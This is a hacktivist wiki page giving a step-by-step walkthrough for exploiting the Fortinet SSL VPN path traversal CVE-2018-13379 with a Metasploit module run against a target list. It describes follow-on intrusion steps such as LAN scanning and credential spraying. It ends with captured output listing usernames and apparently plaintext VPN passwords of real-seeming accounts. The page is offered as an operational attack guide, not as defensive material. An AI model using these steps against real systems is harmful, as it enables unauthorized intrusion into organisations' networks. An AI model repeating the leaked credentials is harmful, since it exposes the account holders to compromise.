Fortinet SSL VPN Path Traversal

From Enlace Hacktivista
Jump to navigation Jump to search

Exploiting CVE-2018-13379 Forti SSL VPN

Exploiting CVE-2018-13379 allows us to gain credentials to the targets VPN. When exploiting CVE-2018-13379 there are a few main ways to gain further access than just the Forti VPN console:

  • Look for Bookmarks in the VPN console which have internal address and credentials already saved
  • Connect to the Forti VPN client locally (Windows server via RDP) and scan the LAN for systems and then spray the VPN credentials as explained here
  • Scan the LAN for vulnerabilities which we can exploit to gain further access into the network

To exploit CVE-2018-13379 we'll use metasploit as it formats the credentials nicely for us.

Start the database and run it:

  • sudo systemctl start postgresql
  • msfdb init

Start msfconsole:

user@host:~$ msfconsole
StArting the Metasploit Framework console...

Use module:

msf6 > use auxiliary/gather/fortios_vpnssl_traversal_creds_leak
msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) >

Set your targets:

msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > set RHOSTS file:targets.txt
RHOSTS => file:targets.txt

Run the exploit module!

msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > run

[*] - Trying to connect.
[+] - Vulnerable!

View the credentials:

msf6 auxiliary(gather/fortios_vpnssl_traversal_creds_leak) > creds

host           origin         service            public       private         realm  private_type  JtR Format
----           ------         -------            ------       -------         -----  ------------  ----------    10443/tcp (https)  admin        8401327                Password    10443/tcp (https)  cvilleneuve  3264012                Password    10443/tcp (https)  vdujardin    Jouv2018$              Password    10443/tcp (https)  montechti    Thomas2005             Password    10443/tcp (https)  hvac         Winter2022             Password